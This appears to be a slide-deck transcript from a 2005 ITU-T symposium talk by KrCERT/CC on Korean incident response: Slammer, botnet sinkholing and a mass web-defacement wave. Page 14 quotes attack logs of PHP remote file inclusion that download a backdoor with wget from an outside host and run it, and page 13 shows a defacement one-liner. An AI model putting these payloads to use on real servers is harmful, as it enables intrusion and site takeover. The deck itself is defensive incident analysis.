The countermeasure against two security issues in Korea

16
International Telecommunication Union ITU-T Cybersecurity II Symposium 29 March 2005, Moscow, Russian Federation The countermeasure against The countermeasure against two security issues in Korea two security issues in Korea HyunCheol Jeong KISC / KrCERT/CC Korea Information Security Agency

Transcript of The countermeasure against two security issues in Korea

Page 1: The countermeasure against two security issues in Korea

International Telecommunication Union

ITU-T Cybersecurity II Symposium 29 March 2005, Moscow, Russian Federation

The countermeasure against The countermeasure against two security issues in Koreatwo security issues in Korea

HyunCheol JeongKISC / KrCERT/CC

Korea Information Security Agency

Page 2: The countermeasure against two security issues in Korea

2dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Contents

o Slammer in Koreao PC Survival Timeo Limitation of Reactive CERTo Role of KISCo Nowadays Security Issues in Koreao Bot/BotNeto Web Defacement

Page 3: The countermeasure against two security issues in Korea

3dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Slammer in Korea

o Internet collapse by Slammer• About 8,800 Servers were infected• Too fast : 1M~5M UDP Packets/Sec• International Gateway was bottle-neck

• 99% worm packets rushed to international gateway

Slammer Worm

1W 2W 3W 4W 5W

Page 4: The countermeasure against two security issues in Korea

4dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

PC Survival Time

97min 12sec1min 37sec20min 52secWin 2K SP4

95min 42sec8sec13min 5secWin XP SP1MAXMINAverage

Win XP SP1(30PCs) Win 2K SP4(30PCs)

Tested in our HoneyNet(Jan. 2005)

o PC survival time is too short• 90% PCs are infected in 1 hour

Page 5: The countermeasure against two security issues in Korea

5dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Limitation of Reactive CERT

o Most CERTs are focused on Reactive Services• Incident Handling, Vulnerability Handling,

Artifact Handlingo So, CERTs gather information in a PASSIVE

way• Report us after incidents happened

o We can’t respond rapidly against nowadays worm

o How CERTs will be able to gather real-time information and DO monitoring?

Page 6: The countermeasure against two security issues in Korea

6dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Role of KISC

o KISC : Korea Internet Security Center• Established on Dec. 2003 after slammer worm

o KISC can do following things by the Law• ISP/IDC inform us traffic status & incident information• We can recommend ISPs to block specific malicious traffics• We can request audit trails to ISPs for analysis• But, No authority for investigation

o KISC runs a watch center which can monitor the Korean Network inreal time.

o Hotlines between KISC, ISPs, IDCs, Vendors and Related Organizations

Page 7: The countermeasure against two security issues in Korea

7dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Role of KISC

Remote Agent

Notice Mail

IDS/Firewall

User

S/W,H/W

AV/Vaccine

ISP/ESM

Vul.

Worm

Detc .

Fore

ign

Info.

Notif

icatio

n

Mail

Web.

SMS

Messenger

FAX

TRS

KISC

Analysis

Propagation

Detect

Recovery

Private SectorsPrivate SectorsPrivate Sectors

Home UsersHome UsersHome Users

Press & TV/RadioPress & TV/RadioPress & TV/Radio

ISP Hot LinersISP Hot Liners

PropagationPropagationPropagationDetectDetectDetect AnalysisAnalysisAnalysis

Major ISPs &

MSSP

Foreign Ptn

KISC

Incid

ent

Repo

rt

Page 8: The countermeasure against two security issues in Korea

8dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Nowadays Security Issues in Korea

o Mixed Attack• Worm, Virus, Trojan, Backdoor, …

o Hacking for Not curious But Money• Phishing, Spyware, Spam, …

o Information Security also important• Bot/BotNet, Web defacement

Page 9: The countermeasure against two security issues in Korea

9dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Bot/BotNet

1. Install Bot with hacking

2. Connect to malicious Bot C&C

3. Control

Attacker

Bot C&C(IRC Server)

Infected PCs

4. Cyber Crime(Information leakage, DDoS, Spamming, …)

1st Response

2nd Response

o Bot = Worm + Trojan + Backdooro BotNet is a Army for cyber crimeo Korea is major Target (So many Korean PCs are infected)

• Because our high-speed network & about 30M PC users

Page 10: The countermeasure against two security issues in Korea

10dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Bot/BotNet

o 1st Response : Bot C&C

Bot C&C DB

HoneyNet

Vaccine Vendor

Foreign Information(nsp-sec, FIRST, …)

Bot C&CIncident Handling

Bot C&CIncident Handling

DNS SinkholeDNS Sinkhole

Remote TriggedBlackhole routing

Remote TriggedBlackhole routing

Share with ISPs

Bot C&C Information

zone "irc.bot.net" {type master;file "/etc/db.badname";};-------------------------IN A 127.0.0. 1

Domain name

IP Address

Domestic Serve

r

ISPs ip route 111.111.111.111 255.255.255.255 Null0 Tag 66

Page 11: The countermeasure against two security issues in Korea

11dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Bot/BotNet

o 2nd Response : Prevention & Response fromBot Infection• It’s most important but difficult

• Too many PCs Infected and not controlled

• Infected PCs can be find with DNS sinkhole & network flow monitoring

• Windows XP release & Bot remove campaign (Jun. 2005)

Page 12: The countermeasure against two security issues in Korea

12dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Web Defacement

o Over 7,000 Korean Web Sites were defaced (Dec 22, 2004 ~ Feb 1. 2005)• Many Web hosting servers were attacked• Attacked by PHP based web bulletin-board vul.

38280 127 339 337 172 262 423

709335

7561,034

6,478

0

1000

2000

3000

4000

5000

6000

7000

2004.1. 2004.2. 2004.3. 2004.4. 2004.5. 2004.6. 2004.7. 2004.8. 2004.9. 2004.10. 2004.11. 2004.12. 2005.1.

# of web defacement in Korea

<Source : www.zone-h.org>

Page 13: The countermeasure against two security issues in Korea

13dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Web Defacement

o Scenario of Mass Web Defacement

Information Gathering

Gain Web Server privilegewith PHP Vulnerability

Gain root privilege with local exploit

Mass defacement

find /home/data -name "index.*" -exec cp /tmp/index.html {} \;

Page 14: The countermeasure against two security issues in Korea

14dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Web Defacement

o Attack Logs/zboard/include/print_category.php?setup=1&dir=http://www.xx.xx.xx.xx.com.xx/newcmd.gif?&cmd=id HTTP/1.1" 200 4220 ? execute remote code and check the websever owner

/zboard/include/print_category.php?setup=1&dir=http://www.xx.xx.xx.xx.com.xx/newcmd.gif?&cmd=cd%20/tmp%20;%20wget%20http://nickvicq.xxx.net/BD/r0nin HTTP/1.1" 200 4892 ? download backdoor program

/zboard/include/print_category.php?setup=1&dir=http://www.xx.xx.xx.xx.com.br/newcmd.gif?&cmd=cd%20/tmp%20;%20chmod%20777%20r0nin%20;%20./r0nin HTTP/1.1" 200 4204 ? execute backdoor program

Port listening on TCP/1666

Connect through backdoor port

access_log

Page 15: The countermeasure against two security issues in Korea

15dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

Web Defacement

o Countermeasure against Web Defacement• Guide for Secure Web programming• Web Application Vulnerability Patch

Web Security Expert

Web Operator

KrCERTKrCERT/CC/CC

Foreign Web Site

Web DeveloperPatch ReleasePatch Release

VulVul. Info.. Info.Assist for PatchAssist for Patch

VulVul. Info. Info

Consult for Consult for PatchPatch

WebWeb vulvul. DB. DB

Web patch history DBWeb patch history DB

Develop GuideDevelop Guide

Patch Patch HistoryHistory

VulVul. Info. Info

Guide R

elease

Guide R

elease

VulVul. In

fo.. In

fo.

Web Vulnerability Web Vulnerability Info. ShareInfo. Share

Develop Develop PatchPatch

Page 16: The countermeasure against two security issues in Korea

16dates

ITU-T

ITU-T Cybersecurity II Symposium29 March 2005, Moscow, Russian Federation

o Thank you !!o http://www.krcert.or.kro [email protected]